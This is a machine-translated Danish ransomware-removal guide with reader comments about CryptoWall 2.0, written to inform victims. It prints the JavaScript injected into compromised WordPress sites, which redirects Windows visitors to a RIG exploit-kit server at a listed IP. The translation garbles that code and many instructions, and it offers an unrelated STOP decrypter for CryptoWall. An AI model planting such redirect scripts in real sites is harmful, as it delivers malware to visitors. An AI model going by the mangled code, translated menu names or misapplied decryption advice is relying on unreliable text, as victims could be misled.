Hjem > Ransomware > Fjern CryptoWall 2.0 og Gendan de krypterede filer
TRUSSEL FJERNELSE

Fjern CryptoWall 2.0 og Gendan de krypterede filer

Fjern-CryptoWall2.0

Hvad er CryptoWall 2.0?

Den CryptoWall ransomware har været en enorm trussel for netværksadministratorer og pc-brugere, lige siden det oprindeligt blev udgivet, fordi det krypterer de lokale data samt data fundet på netværk aktier. Den nye version af ransomware, CryptoWall 2.0 er nu forbedret, hvilket gør det endnu sværere for brugeren at gendanne de krypterede filer uden at betale løsesum.

CryptoWall 2.0 – Hvad gør den?

De cyberkriminelle bruge deres egne TEI gateways i den nyeste CryptoWall versionen. En individuel tegnebog id bliver sendt til hvert enkelt offer i stedet for de tidligere anvendte hårdt kodede links, der var det samme for næsten alle ofre. Også, de originale ukrypterede filer er nu sikkert slettet.

Egne TOR Gateways

Løsepenge betalingssystemer servere CyptoWall er placeret på TOR. Dette gør det muligt ransomware skabere at forblive skjult fra myndighederne. For brugeren at være i stand til at oprette forbindelse til serveren, han har brug for at få adgang til TOR-netværket, og de fleste brugere finder det temmelig vanskeligt at installere TOR i første omgang. Derfor er CryptoWall brugte en web-til-TOR-gateway, som tillod de ransomware ofre at få adgang til betaling serveren nemt. Som udbydere af denne gateway indså, hvad der foregik, de begyndte at blackliste deres betalingssystemer servere, så de ikke vil blive anvendt til skadelige formål. Den nye version af CryptoWall har nu sit eget betalings server - pay2tor.com, tor4pay.com og pay4tor.com.

En Unik Wallet ID for hvert offer

De brugere, der valgte at betale løsesummen er forsynet med en individuel tegnebog id, der er unikt for hvert offer. Oprindeligt, Brugerne fik ikke præsenteret med denne indstilling, der tillod folk at stjæle andre brugeres betalingstransaktioner og bruge det som deres egen løsesum betalinger. De unikke betalingssystemer adresser til hvert offer dette ikke er muligt længere.

The Original Ukrypterede filerne Sikker Slettet

Dette er en anden ny funktion for CryptoWall 2.0. I den tidligere version, den ransomware vil kryptere ofrets datafiler og så bare slette de originale. Dette gjorde det muligt for data opsving værktøj til at gendanne oplysninger, der blev krypteret. Denne metode kan ikke længere anvendes som CryptoWall 2.0 sikkert sletter offerets data. Dette efterlader kompromitteret brugeren to muligheder kun: enten til at gendanne filer fra backup eller til at betale det krævede beløb.

Hvordan har jeg det?

Sikkerhed Eksperter har for nylig observeret hackere udnytter sårbare WordPress forbindelser med henblik på at omdirigere computerbrugere til servere, der er vært for RIG Exploit Kit. Sidstnævnte misbrug et stort antal sårbarheder i unpatched Flash, Java og mange andre applikationer for at droppe den nye version af denne ransomware. Ifølge Dynamoo blog, spammerne bag denne kampagne er de samme, udloddet den seneste eFax spam-besked, men denne gang de leverer CryptoWall 2.0 i stedet. Det samme blog afslører også følgende oplysninger:

  • hxxp://206.253.165.76:8080 er server hosting riggen Exploit Kit.
  • hxxp://206.253.165.76:8080/words / rot.php er den udnytte omdirigeringsprogrammet.
  • hxxp://206.253.165.76:8080/words / ef.html er spam rapporteres af bloggen.

Kompromitteret WordPress forbindelser er kendt for at indeholde denne kode:

→script
var OSName = "Ukendt OS";
hvis (navigator.appVersion.indexOf("Win")!= -1) OSName = "Windows"; hvis (navigator.appVersion.indexOf("Mac")!= -1) OSName = "MacOS"; hvis (navigator.appVersion.indexOf("X11")!= -1) OSName = "UNIX"; hvis (navigator.appVersion.indexOf("Linux")!= -1) OSName = "Linux"; Var1 = 112; var2 = var1;
hvis(OSName == "Windows") {location.replace("Hxxp://206.253.165.76:8080/words / rot.php ");}andet{location.replace(”https://google.com/search?q = eFax ");}
/script

Sådan fjernes CryptoWall 2.0 og Gendan de krypterede filer

Berta Bilbao

Berta er en dedikeret malware forsker, drømmer om en mere sikker cyberspace. Hendes fascination af it-sikkerhed begyndte for et par år siden, da en malware låst hende ud af hendes egen computer.

Flere indlæg


  • Trin 1
  • Trin 2
  • Trin 3
  • Trin 4
  • Trin 5

Trin 1: Scan efter CryptoWall 2.0 med SpyHunter Anti-Malware værktøj

1. Klik på "Hent" for at fortsætte til SpyHunter's downloadside.


Det anbefales at køre en scanning, inden de køber den fulde version af softwaren til at sørge for, at der kan registreres den aktuelle version af malware ved SpyHunter. Klik på de tilsvarende links for at kontrollere SpyHunter's EULA, Fortrolighedspolitik og Kriterier trusselsvurdering.


2. Når du har installeret SpyHunter, vente på, at den opdateres automatisk.

scan efter og slet ransomware virus trin 2


3. Efter opdateringen er færdig, klik på fanen 'Malware/PC-scanning'. Et nyt vindue vises. Klik på 'Start scanning'.

scan efter og slet ransomware virus trin 3


4. Efter SpyHunter har færdig med at scanne din pc for eventuelle filer af den tilhørende trussel og fandt dem, du kan prøve at få dem fjernet automatisk og permanent ved at klikke på 'Næste'-knappen.

scan efter og slet ransomware virus trin 4

Hvis nogen trusler er blevet fjernet, Det anbefales stærkt at genstarte din pc.

Automatisk fjernelse af ransomware - Videoguide

Trin 2: Afinstaller CryptoWall 2.0 og relateret malware fra Windows

Her er en metode i nogle få nemme trin, der bør være i stand til at afinstallere de fleste programmer. Uanset om du bruger Windows 10, 8, 7, Vista eller XP, disse skridt vil få arbejdet gjort. At trække det program eller dets mappe til papirkurven kan være en meget dårlig beslutning. Hvis du gør det, stumper og stykker af programmet er efterladt, og det kan føre til ustabile arbejde på din PC, fejl med filtypen foreninger og andre ubehagelige aktiviteter. Den rigtige måde at få et program fra din computer er at afinstallere det. For at gøre dette:


1. Hold Windows Logo-knap og "R" på dit tastatur. Et pop-up vindue vises.
slet ransomware fra Windows trin 1


2. I feltet type "appwiz.cpl" og tryk på ENTER.
slet ransomware fra Windows trin 2


3. Dette vil åbne et vindue med alle de programmer, der er installeret på pc'en. Vælg det program, du vil fjerne, og tryk på "Afinstaller"
slet ransomware fra Windows trin 3Følg instruktionerne ovenfor, og du vil med succes slette de fleste uønskede og ondsindede programmer.


Trin 3: Rens eventuelle registre, skabt af CryptoWall 2.0 på din computer.

De normalt målrettede registre af Windows-maskiner er følgende:

  • HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Run
  • HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Run
  • HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion RunOnce
  • HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion RunOnce

Du kan få adgang til dem ved at åbne Windows Registry Editor og slette eventuelle værdier, skabt af CryptoWall 2.0 der. Dette kan ske ved at følge trinene nedenunder:

1. Åbn Kør vindue igen, typen "regedit" og klik på OK.
slet ransomware virus registre trin 1


2. Når du åbner det, du kan frit navigere til Kør og RunOnce nøgler, hvis placering er vist ovenfor.
slet ransomware virus registre trin 2


3. Du kan fjerne værdien af ​​virus ved at højreklikke på den og fjerne det.
slet ransomware virus registre trin 3 Tip: For at finde en virus-skabt værdi, du kan højreklikke på det og klikke "Modificere" at se, hvilken fil det er indstillet til at køre. Hvis dette er virus fil placering, fjerne værdien.

VIGTIGT!
Inden start "Trin 4", be om boot tilbage til normal tilstand, hvis du er i øjeblikket i fejlsikret tilstand.
Dette vil gøre det muligt for dig at installere og brug SpyHunter 5 succesfuld.

Trin 4: Boot din pc i fejlsikret tilstand for at isolere og fjerne CryptoWall 2.0

TILBUD

Manuel fjernelse Normalt tager tid, og du risikerer at beskadige din filer, hvis ikke Omhyggelig!
Vi anbefaler at scanne din pc med SpyHunter

Husk, at SpyHunter scanner er kun for malware afsløring. Hvis SpyHunter registrerer malware på din pc, skal du købe SpyHunters værktøj til fjernelse af malware for at fjerne malware-trusler. Læs vores SpyHunter 5 bedømmelse. Klik på de tilsvarende links for at kontrollere SpyHunter's EULA, Fortrolighedspolitik og Kriterier trusselsvurdering

1. Hold Windows-tasten nede + R.
fjerne ransomware i fejlsikret tilstand trin 1


2. Den "Løbe" Vindue vises. I det, typen "msconfig" og klik på OK.
fjerne ransomware i fejlsikret tilstand trin 2


3. Gå til "Støvle" fanen. Der vælges "Sikker start" og klik derefter på "Anvende" og "OK".
fjerne ransomware i fejlsikret tilstand trin 3
Tip: Sørg for at vende disse ændringer ved at fjerne markeringen sikker start, efter at, fordi dit system altid vil starte i Sikker start fra nu af.


4. Når du bliver bedt, Klik på "Genstart" at gå ind i fejlsikret tilstand.
fjerne ransomware i fejlsikret tilstand trin 4


5. Du kan genkende fejlsikret tilstand med ordene skrevet på hjørnerne af skærmen.
fjerne ransomware i fejlsikret tilstand trin 5


Trin 5: Prøv at gendanne filer krypteret med CryptoWall 2.0.

Metode 1: Brug STOP Decrypter af Emsisoft.

Ikke alle varianter af denne ransomware kan dekrypteres gratis, men vi har tilføjet den decryptor bruges af forskere, der ofte opdateret med de varianter, der i sidste ende blive dekrypteret. Du kan prøve og dekryptere dine filer ved hjælp nedenstående vejledning, men hvis de ikke arbejde, så desværre din variant af ransomware virus er ikke dekrypteres.

Følg instruktionerne nedenfor for at bruge Emsisoft Decrypter og dekryptere dine filer gratis. Du kan downloade Emsisoft dekryptering værktøj knyttet her og derefter følge trinene nedenfor tilvejebragte:

1 Højreklik på Decrypter og klik på Kør som administrator som vist nedenfor:

stop ransomware-dekrypteringstrin 1

2. Enig med licensbetingelserne:

stop ransomware-dekrypteringstrin 2

3. Klik på "Tilføj mappe" og derefter tilføje de mapper, hvor du ønsker filerne dekrypteret som vist nedenunder:

stop ransomware-dekrypteringstrin 3

4. Klik på "Dekryptér" og vente på dine filer, der skal afkodes.

stop ransomware-dekrypteringstrin 4

Note: Kredit til decryptor går til Emsisoft forskere, der har gjort det gennembrud med denne virus.

Metode 2: Brug datagendannelsessoftware

Ransomware infektioner og CryptoWall 2.0 til formål at kryptere dine filer ved hjælp af en krypteringsalgoritme, som kan være meget svært at dekryptere. Det er derfor, vi har foreslået en data recovery metode, der kan hjælpe dig med at gå rundt direkte dekryptering og forsøge at gendanne dine filer. Husk, at denne metode ikke kan være 100% effektiv, men kan også hjælpe dig lidt eller meget i forskellige situationer.

1. Download den anbefalede datagendannelsessoftware ved at klikke på linket nedenunder:

Du skal blot klikke på linket og på hjemmesidens menuer øverst, vælge data Recovery - Guiden til gendannelse af data til Windows eller Mac (afhængigt af dit operativsystem), og download og kør derefter værktøjet.


CryptoWall 2.0-FAQ

Hvad er CryptoWall 2.0 Ransomware?

CryptoWall 2.0 er en ransomware infektion - den ondsindede software, der lydløst kommer ind på din computer og blokerer enten adgang til selve computeren eller krypterer dine filer.

Mange ransomware-vira bruger sofistikerede krypteringsalgoritmer til at gøre dine filer utilgængelige. Målet med ransomware-infektioner er at kræve, at du betaler en løsepenge-betaling for at få adgang til dine filer tilbage.

What Does CryptoWall 2.0 Ransomware Do?

Ransomware er generelt en ondsindet software der er designet for at blokere adgangen til din computer eller filer indtil en løsesum er betalt.

Ransomware-virus kan også beskadige dit system, korrupte data og slette filer, resulterer i permanent tab af vigtige filer.

How Does CryptoWall 2.0 Inficere?

Via flere måder. CryptoWall 2.0 Ransomware inficerer computere ved at blive sendt via phishing-e-mails, indeholder virus vedhæftning. Denne vedhæftning maskeres normalt som et vigtigt dokument, lignende En faktura, bankdokument eller endda en flybillet og det ser meget overbevisende ud for brugerne.

Another way you may become a victim of CryptoWall 2.0 is if you download et falsk installationsprogram, crack eller patch fra et websted med lavt omdømme eller hvis du klikker på et viruslink. Mange brugere rapporterer at få en ransomware-infektion ved at downloade torrents.

How to Open .CryptoWall 2.0 filer?

Du can't uden en dekryptering. På dette tidspunkt, den .CryptoWall 2.0 filer er krypteret. Du kan kun åbne dem, når de er dekrypteret ved hjælp af en specifik dekrypteringsnøgle til den bestemte algoritme.

Hvad skal man gøre, hvis en dekryptering ikke virker?

Gå ikke i panik, og sikkerhedskopiere filerne. Hvis en dekrypter ikke dekrypterede din .CryptoWall 2.0 filer med succes, så fortvivl ikke, fordi denne virus stadig er ny.

Kan jeg gendanne ".CryptoWall 2.0" Filer?

Ja, undertiden kan filer gendannes. Vi har foreslået flere filgendannelsesmetoder det kunne fungere, hvis du vil gendanne .CryptoWall 2.0 filer.

Disse metoder er på ingen måde 100% garanteret, at du vil være i stand til at få dine filer tilbage. Men hvis du har en sikkerhedskopi, dine chancer for succes er meget større.

How To Get Rid of CryptoWall 2.0 Virus?

Den sikreste måde og den mest effektive til fjernelse af denne ransomware-infektion er brugen a professionelt anti-malware program.

Det vil scanne efter og finde CryptoWall 2.0 ransomware og fjern det derefter uden at forårsage yderligere skade på dit vigtige. CryptoWall 2.0 filer.

Kan jeg rapportere Ransomware til myndigheder?

Hvis din computer blev inficeret med en ransomware-infektion, du kan rapportere det til de lokale politiafdelinger. Det kan hjælpe myndigheder overalt i verden med at spore og bestemme gerningsmændene bag den virus, der har inficeret din computer.

Nedenfor, Vi har udarbejdet en liste med offentlige websteder, hvor du kan indgive en rapport, hvis du er offer for en cyberkriminalitet:

Cybersikkerhedsmyndigheder, ansvarlig for håndtering af ransomware-angrebsrapporter i forskellige regioner over hele verden:

Tyskland - Officiel portal for det tyske politi

Forenede Stater - IC3 Internet Crime Complaint Center

Storbritannien - Action svig politi

Frankrig - Indenrigsministeriet

Italien - Statens politi

Spanien - Nationalt politi

Holland - Retshåndhævelse

Polen - Politi

Portugal - Justitspolitiet

Grækenland - Enhed om cyberkriminalitet (Hellenske politi)

Indien - Mumbai-politiet - CyberCrime-undersøgelsescelle

Australien - Australsk High Tech Crime Center

Rapporter kan besvares inden for forskellige tidsrammer, afhængigt af dine lokale myndigheder.

Kan du stoppe Ransomware i at kryptere dine filer?

Ja, du kan forhindre ransomware. Den bedste måde at gøre dette på er at sikre, at dit computersystem er opdateret med de nyeste sikkerhedsrettelser, bruge et velrenommeret anti-malware program og firewall, sikkerhedskopiere dine vigtige filer ofte, og undgå at klikke videre ondsindede links eller downloade ukendte filer.

Can CryptoWall 2.0 Ransomware Steal Your Data?

Ja, i de fleste tilfælde ransomware vil stjæle dine oplysninger. It is a form of malware that steals data from a user's computer, krypterer det, og kræver derefter en løsesum for at dekryptere den.

I mange tilfælde, den malware forfattere eller angribere vil true med at slette data eller udgive det online medmindre løsesummen er betalt.

Kan Ransomware inficere WiFi?

Ja, ransomware kan inficere WiFi-netværk, da ondsindede aktører kan bruge det til at få kontrol over netværket, stjæle fortrolige data, og låse brugere ud. Hvis et ransomware-angreb lykkes, det kan føre til tab af service og/eller data, og i nogle tilfælde, økonomiske tab.

Skal jeg betale Ransomware?

Nej, du bør ikke betale ransomware-afpressere. At betale dem opmuntrer kun kriminelle og garanterer ikke, at filerne eller dataene bliver gendannet. Den bedre tilgang er at have en sikker backup af vigtige data og være opmærksom på sikkerheden i første omgang.

What Happens If I Don't Pay Ransom?

If you don't pay the ransom, hackerne kan stadig have adgang til din computer, data, eller filer og kan fortsætte med at true med at afsløre eller slette dem, eller endda bruge dem til at begå cyberkriminalitet. I nogle tilfælde, de kan endda fortsætte med at kræve yderligere løsepengebetalinger.

Kan et Ransomware-angreb opdages?

Ja, ransomware kan detekteres. Anti-malware-software og andre avancerede sikkerhedsværktøjer kan opdage ransomware og advare brugeren når det er til stede på en maskine.

Det er vigtigt at holde sig ajour med de seneste sikkerhedsforanstaltninger og at holde sikkerhedssoftware opdateret for at sikre, at ransomware kan opdages og forhindres.

Bliver ransomware-kriminelle fanget?

Ja, ransomware-kriminelle bliver fanget. Retshåndhævende myndigheder, såsom FBI, Interpol og andre har haft succes med at opspore og retsforfølge ransomware-kriminelle i USA og andre lande. I takt med at ransomware-trusler fortsætter med at stige, det samme gør håndhævelsesaktiviteten.

About the CryptoWall 2.0 Forskning

Indholdet udgiver vi på SensorsTechForum.com, this CryptoWall 2.0 guide til fjernelse medfølger, er resultatet af omfattende forskning, hårdt arbejde og vores teams hengivenhed til at hjælpe dig med at fjerne den specifikke malware og gendanne dine krypterede filer.


Hvordan udførte vi undersøgelsen af ​​denne ransomware?

Vores forskning er baseret på en uafhængig undersøgelse. Vi er i kontakt med uafhængige sikkerhedsforskere, og som sådan, vi modtager daglige opdateringer om de seneste malware- og ransomware-definitioner.

Endvidere, the research behind the CryptoWall 2.0 ransomware-truslen bakkes op med VirusTotal og NoMoreRansom projekt.

For bedre at forstå ransomware-truslen, Se venligst følgende artikler, som giver kyndige detaljer.


Som et sted, der siden har været dedikeret til at levere gratis fjernelsesinstruktioner for ransomware og malware 2014, SensorsTechForum's anbefaling er at Vær kun opmærksom på pålidelige kilder.

Sådan genkendes pålidelige kilder:

  • Kontroller altid "Om os" hjemmeside.
  • Profil af indholdsskaberen.
  • Sørg for, at rigtige mennesker er bag webstedet og ikke falske navne og profiler.
  • Bekræft Facebook, LinkedIn og Twitter personlige profiler.

6 Kommentarer
  1. relic99

    Den opdaterede version vil holde dig fra at køre eller installere virus løsninger, fjerne den inficerede drev og slave den til en anden computer for scanning. Et betalt abonnement på CryptoPrevent er det eneste værktøj jeg kender for at forhindre infektioner i v2.

    Svar
    1. Jay

      Jeg løb ind i, hvad der må have været en ny variant blot et par dage siden. Jeg kunne ikke udrydde det med den berørte Windows-maskine aktiv, så jeg knoklet også smittet drev til en ikke-inficerede maskine, og fortsatte med at scanne hele drevet med følgende: Malwarebytes, Hitman Pro, TDSSKIller, Avast Antivirus, og endelig fulgt op med ESET. Og infektionen stadig kom tilbage så snart maskinen var forbundet til internettet, åbenbart hægte nogle Internet Explorer proces til at gøre det. Jeg kunne finde nogen DNS ændringer, ingen HOSTS fil ændringer, og installeret nogen Winsock kroge eller BHOs ​​at tage højde for det. Jeg endte tørrer drevet og en gendannelse af fabriksindstillinger. Noget jeg sjældent har at gøre for malware infektioner. Forud for at gøre, at jeg forsøgte at gendanne filer fra øjebliksbilleder (Vind 7 64bit), og ingen var til stede, da malware havde udslettet systemet gendannelsespunkter og alle skygge fil kopier. Jeg var heldigvis i stand til at inddrive nogle filer, der endnu ikke var krypterede, så det ikke var et samlet tab. Dette var mit første møde med Cryptowall, og trods at følge givet råd jeg havde fundet på at fjerne det på diverse sikkerhedsforanstaltninger fora,det kom stadig tilbage desværre. Jeg var nødt til at indrømme nederlag. Nasty bug.

      Svar
  2. Ayesha

    Cryptowall 2.0 er, hvad jeg fik jeg fandt ud af, hvad det blev kaldt dage senere . Men det gjorde ikke slette ? Originalerne ? Da jeg gik til at se / da jeg brugte recovery software det bedste derude. Jeg fik virus på 11-18-2014

    Svar
  3. Chris

    Jeg fik virussen rundt 11/11/2014. Mindst det var den dag, jeg fandt ud af, hvad det var, og slukket min maskine og genstartet i fejlsikret tilstand efter at gøre forskning. Siden da har jeg forsøgt at finde ud af at gendanne filer, der er krypteret. Jeg har 2 måneder værd af fotos, der er krypteret, men info ikke tilføje op. Jeg håber nogen kan kaste lys over problemet. Hvis en fil er krypteret så ville datoen ændret eller oprettet den dato den blev krypteret? Jeg forsøgte at bruge Recuva og anden software til at gendanne, men det siger det ikke var slettet. Nogen ideer?

    Svar
  4. Hipolito Gonzalez

    Hej godmorgen, min pc inficeret af virus criptowall tro v3.0, og mine filer blev krypteret med RSA offentlig nøgle 2048 og jeg har brug for at komme sig, hvis nogen kan hjælpe, jeg vil takke dig meget.
    hilsen
    Hipolito

    Svar
    1. Milena Dimitrova

      Hej Hipolito,

      Vi er kede af at høre du er blevet smittet med CryptoWall 2.0! Sensorstechforum.com/forums/ tilmeld dig vores forum og læs følgende emner: sensorstechforum.com/ fora / internet-og-netværk-sikkerhed / hjælp-dekrypter-filer-krypteret-af-cryptowall-3-0 /
      sensorstechforum.com / fora / malware-fjernelse-spørgsmål-og-vejledninger / hvordan man fjerner-cryptowall-4-0-og-gendanner-dine-data /

      Desværre, RSA-2048-kryptering er ganske vanskeligt at bryde. Vi håber, der er nævnt i de emner værktøjer hjælper dig med at genoprette dine filer! Tøv ikke med at spørge os, hvis du har andre spørgsmål.

      Milena og STF hold

      Svar

Efterlad en kommentar

Din e-mail-adresse vil ikke blive offentliggjort. Krævede felter er markeret *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Fortrolighedspolitik.
Jeg er enig